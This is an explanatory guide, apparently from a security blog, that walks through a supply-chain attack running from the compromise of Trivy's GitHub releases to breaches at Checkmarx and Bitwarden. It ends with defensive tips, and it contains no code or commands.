Introduction
In recent weeks, two major security firms—Checkmarx and Bitwarden—fell victim to a sophisticated supply-chain attack. The incident began with the compromise of Trivy, a popular vulnerability scanner, and escalated to a direct breach of Checkmarx's GitHub account, culminating in a ransomware attack. This guide breaks down the sequence of events step by step, helping security professionals understand how such attacks unfold and what can be done to prevent them.
What You Need
- Basic knowledge of software supply chains and CI/CD pipelines.
- Familiarity with GitHub repositories, tokens, and SSH keys.
- Understanding of common attack vectors like credential theft and malware injection.
- Optional: Access to incident response documentation or a test environment to simulate similar scenarios.
Step 1: Attacker Reconnaissance and Target Selection
The attackers first identified Trivy as a high-value target. Trivy is a widely used open-source vulnerability scanner integrated into many security pipelines. By compromising it, attackers could reach a broad audience, including major firms like Checkmarx and Bitwarden.
Step 2: Initial Compromise of Trivy's GitHub Account
On March 19, the attackers breached Trivy's GitHub account, likely through phishing, credential stuffing, or exploiting weak authentication. Once inside, they had the ability to push code to the repository and modify releases.
Step 3: Malware Injection via Trivy Releases
Using their access, the attackers pushed a malicious update to Trivy users. This malware was designed to silently infect systems that downloaded the compromised version, searching for sensitive data such as repository tokens, SSH keys, and other credentials.
Step 4: Data Exfiltration from Infected Systems
The malware on infected machines scanned local files, environment variables, and stored credentials. It then exfiltrated the stolen data to command-and-control servers controlled by the attackers. Among the victims was Checkmarx, a Trivy user.
Step 5: Weaponizing Stolen Credentials Against Checkmarx
Four days later (March 23), the attackers used credentials harvested from the Trivy malware—possibly tokens belonging to Checkmarx employees—to compromise Checkmarx's own GitHub account. They then pushed malware directly to Checkmarx's users, turning the security firm into both victim and distribution vector.
Step 6: Containment and Remediation by Checkmarx
Checkmarx quickly detected the breach, replaced the malicious files with legitimate versions, and rotated all compromised credentials. However, the damage had already been done; some users had downloaded the malware.
Step 7: The Ransomware Wave
Shortly after the supply-chain incidents, Checkmarx was hit by a ransomware attack, allegedly by a different group seeking fame. This secondary attack exploited residual access or additional vulnerabilities exposed during the earlier breach.
Step 8: Impact on Bitwarden and Other Firms
While the original article focuses on Checkmarx, Bitwarden (another security company) was also singled out by the attackers. The attackers likely used similar techniques—either through the Trivy malware or separate compromises—to target Bitwarden, demonstrating a pattern of attacking security vendors to amplify their reach.
Tips for Defending Against Supply-Chain Attacks
- Audit your dependencies: Regularly review third-party tools and monitor for unexpected updates or behavior.
- Use multi-factor authentication (MFA) on all GitHub accounts and CI/CD systems.
- Principle of least privilege: Limit token permissions and rotate them frequently.
- Monitor for credential leaks: Implement scanning for exposed tokens in code repositories and logs.
- Isolate build environments from production and use integrity checks (e.g., signed commits, checksums).
- Have an incident response plan that includes immediate credential rotation and communication with users.
- Stay informed about active threats: Follow threat intelligence feeds for similar supply-chain attacks.
By understanding each step of the Checkmarx and Bitwarden attack chain, security teams can better prepare their defenses. The key takeaway: attackers increasingly target security tools because they have privileged access to many organizations. Protect your supply chain like the crown jewels.